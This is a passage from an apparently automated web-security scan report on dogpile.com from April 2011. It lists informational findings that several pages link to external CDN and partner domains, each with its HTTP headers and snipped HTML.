Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:43 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7d43bcdc3ae442d4896bc16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7d43bcdc3ae442d4896bc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:40 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:40 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:39 GMT
Connection: Keep-Alive
Content-Length: 1360
Vary: Accept-Encoding, User-Agent

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml">here</a>.</h2>
</body></html>

...[SNIP]...
<p>
The link you clicked on is sending you to the following URL. Please click if you wish to proceed:
<a id="icePage_RedirectLink" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml">http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml</a>
...[SNIP]...

11.26. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/about/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dogpile_about_infographic.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f4a5e3c498ee4fafa621c16a3af0cb01&ActionId=bfbe830ac1c64c0a810fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:24 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:24 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:24 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 44993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="about, about us, metasearch, meta search, metasearch study, search engine, search, google,yahoo, bing, dogpile, dogpile.com, infospace"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="dpInfoGraphicContainer">
                   <img alt="Metasearch study" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dogpile_about_infographic.gif/_iceUrlFlag=15?_IceUrl=true" />
                   <div id="dpInfoGraphicMarkup">
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.27. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/contactUs/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=effaa55f51f3463da4cac16a3af0cb01&ActionId=51412009a454492dac79c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:32:53 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:12:53 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:12:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:12:52 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 43547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta http-equiv="expires" content="0"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.28. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=f1bd779c38af4c89afa5c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:20 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:20 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:20 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="Faq, frequently asked questions, meta search, metasearch, Infospace, dogpile, dogpile.com" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.29. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/about/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_about_infographic.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=c7d0fe76335d40769068c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:05 GMT
Connection: close
Content-Length: 45381
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="about, about us, metasearch, meta search, metasearch study, search engine, search, google,yahoo, bing, dogpile, dogpile.com, infospace"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


